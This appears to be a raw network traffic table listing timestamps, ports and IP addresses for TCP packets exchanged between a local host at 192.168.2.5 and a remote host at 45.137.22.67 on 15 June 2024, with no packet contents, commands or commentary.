Jun 15, 2024 20:22:31.920042992 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.920054913 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.920073032 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.920080900 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.920100927 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.920106888 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.920124054 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.920135021 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.920157909 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.920161009 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.920177937 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.920186996 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.920208931 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.920212984 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.920242071 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.920243025 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.920264006 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.920275927 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.920289993 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.920301914 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.920317888 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.920327902 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.920353889 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.920380116 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.920384884 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.920404911 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.920407057 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.920427084 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.920433044 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.920458078 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.920459032 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.920478106 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.920501947 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.920506954 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.920533895 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.920548916 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.920559883 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.920581102 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.920586109 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.920602083 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.920612097 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.920631886 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.920649052 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.920659065 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.920686007 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.920712948 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.920715094 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.920734882 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.920739889 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.920767069 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.920768023 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.920784950 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.920794010 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.920811892 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.920819998 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.920841932 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.920847893 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.920864105 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.920874119 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.920893908 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.920901060 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.920923948 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.920927048 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.920953035 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.920959949 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.920974016 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.920979023 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.921003103 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.921006918 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.921032906 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.921035051 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.921050072 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.921077967 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.921842098 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.921900988 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.921967983 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.921993971 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.922018051 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.922024965 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.922049999 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.922053099 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.922068119 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.922075987 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.922094107 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.922103882 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.922123909 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.922135115 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.922147036 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.922159910 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.922182083 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.922187090 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.922204971 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.922211885 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.922238111 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.922240019 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.922252893 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.922277927 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.923299074 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.923346996 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.923583031 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.923609972 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.923636913 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.923666954 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.923693895 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.923710108 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.923770905 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.926501989 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.926561117 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.926654100 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.926704884 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.926752090 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.926841974 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.927537918 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.927566051 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.927592993 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.927613020 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.927618980 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.927642107 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.927645922 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.927663088 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.927673101 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.927690029 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.927699089 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.927711964 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.927725077 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.927751064 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.927752018 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.927762032 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.927777052 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.927802086 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.927803993 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.927823067 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.927829981 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.927855968 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.927882910 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.927908897 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.927934885 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.927961111 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.928008080 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.928035021 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.928061962 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.928087950 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.928113937 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.928139925 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.928164959 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.928190947 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.928217888 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.928244114 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.928268909 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.928294897 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.928320885 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.928347111 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.928373098 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.928399086 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.928426027 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.928474903 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.928522110 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.928549051 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.928575039 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.928601980 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.928628922 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.928654909 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.928682089 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.928709030 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.928734064 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.928760052 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.928785086 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.928811073 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.928838015 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.928864002 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.928890944 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.928916931 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.928945065 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.928971052 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.928997040 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.929023027 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.929049015 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.929074049 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.929100037 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.929148912 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.929183006 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.929208994 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.929234982 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.929261923 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.929287910 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.929313898 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.929339886 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.929366112 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.929392099 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.929418087 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.929445028 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.929470062 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.929497957 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.929523945 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.929550886 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.929577112 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.929603100 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.929629087 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.929655075 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.929680109 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.929708004 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.929734945 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.929761887 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.929789066 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.929833889 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.929872036 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.929898977 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.929924965 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.929951906 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.929977894 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930005074 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930031061 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930057049 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930083036 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930113077 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930140018 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930166006 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930191994 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930218935 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930244923 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930270910 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930296898 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930322886 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930347919 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930372953 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930385113 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930396080 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930423021 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930449963 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930480957 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930511951 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930537939 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930565119 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930591106 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930618048 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930644035 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930670023 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930695057 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930721045 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930747032 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930773973 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930799961 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930825949 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930851936 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930877924 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930903912 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930929899 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930955887 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.930983067 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.931009054 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.931035042 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.931061029 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.931086063 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.931113005 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.931143045 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.931174994 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.931201935 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.931226969 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.931252956 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.931281090 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.931307077 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.931333065 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.931359053 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.931385040 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.931411028 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.931437969 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.931463957 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.931490898 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.931516886 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.931543112 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.931569099 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.931595087 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.931621075 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.931647062 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.931673050 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.931699038 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.931725025 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.931751966 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.931777954 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.931824923 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.931858063 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.931885958 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.931912899 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.931938887 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.931965113 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.931992054 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.932018042 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.932044029 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.932070971 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.932096004 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.932122946 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.932149887 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.932177067 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.932203054 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.932229042 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.932255030 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.932281017 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.932306051 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.932332039 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.932357073 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.932384014 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.932410002 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.932435036 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.932466030 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.937645912 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.937671900 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.937697887 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.937949896 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.937977076 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.938003063 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.938028097 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.938054085 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.938081026 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.938107014 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.938133001 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.938158035 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.938184023 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.938210011 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.938235998 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.938262939 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.938290119 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.938314915 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.938340902 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.938366890 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:33.103362083 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:33.121454000 CEST	49722	55615	192.168.2.5	45.137.22.67
